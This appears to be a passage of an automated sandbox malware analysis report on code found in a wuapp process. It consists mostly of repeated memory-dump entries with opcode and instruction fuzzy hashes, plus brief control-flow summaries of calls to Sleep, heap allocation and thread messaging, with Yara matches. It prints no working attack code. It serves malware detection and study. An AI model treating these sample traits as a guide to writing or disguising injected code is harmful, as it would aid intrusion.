                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                          • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                          • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                          • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 243 a9070-a909f 244 a90ab-a90b2 243->244 245 a90a6 call abd30 243->245 246 a90b8-a9108 call abe00 call 9ace0 call a4e40 244->246 247 a918c-a9192 244->247 245->244 254 a9110-a9121 Sleep 246->254 255 a9123-a9129 254->255 256 a9186-a918a 254->256 257 a912b-a9151 call a8c90 255->257 258 a9153-a9173 255->258 256->247 256->254 260 a9179-a917c 257->260 258->260 261 a9174 call a8ea0 258->261 260->256 261->260
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 000A9118
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 263 a9066-a9069 264 a906b 263->264 265 a907f-a90b2 call abd30 263->265 266 a906d-a907b 264->266 267 a9061-a9065 264->267 270 a90b8-a9108 call abe00 call 9ace0 call a4e40 265->270 271 a918c-a9192 265->271 266->265 278 a9110-a9121 Sleep 270->278 279 a9123-a9129 278->279 280 a9186-a918a 278->280 281 a912b-a9151 call a8c90 279->281 282 a9153-a9173 279->282 280->271 280->278 284 a9179-a917c 281->284 282->284 285 a9174 call a8ea0 282->285 284->280 285->284
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 000A9118
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 287 aa692-aa699 288 aa69b-aa6cc call aaf50 287->288 289 aa62d-aa634 287->289 290 aa63c-aa651 RtlAllocateHeap 289->290 291 aa637 call aaf50 289->291 291->290
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(&E,?,000A4C9F,000A4C9F,?,000A4526,?,?,?,?,?,00000000,00000000,?), ref: 000AA64D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID: &E
                                                          • API String ID: 1279760036-2925179166
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 307 aa652-aa677 call aaf50 309 aa67c-aa691 RtlFreeHeap 307->309
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00093AF8), ref: 000AA68D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 313 aa620-aa651 call aaf50 RtlAllocateHeap
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(&E,?,000A4C9F,000A4C9F,?,000A4526,?,?,?,?,?,00000000,00000000,?), ref: 000AA64D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID: &E
                                                          • API String ID: 1279760036-2925179166
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 316 aa660-aa676 317 aa67c-aa691 RtlFreeHeap 316->317 318 aa677 call aaf50 316->318 318->317
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00093AF8), ref: 000AA68D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009836A
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009838B
                                                          Memory Dump Source
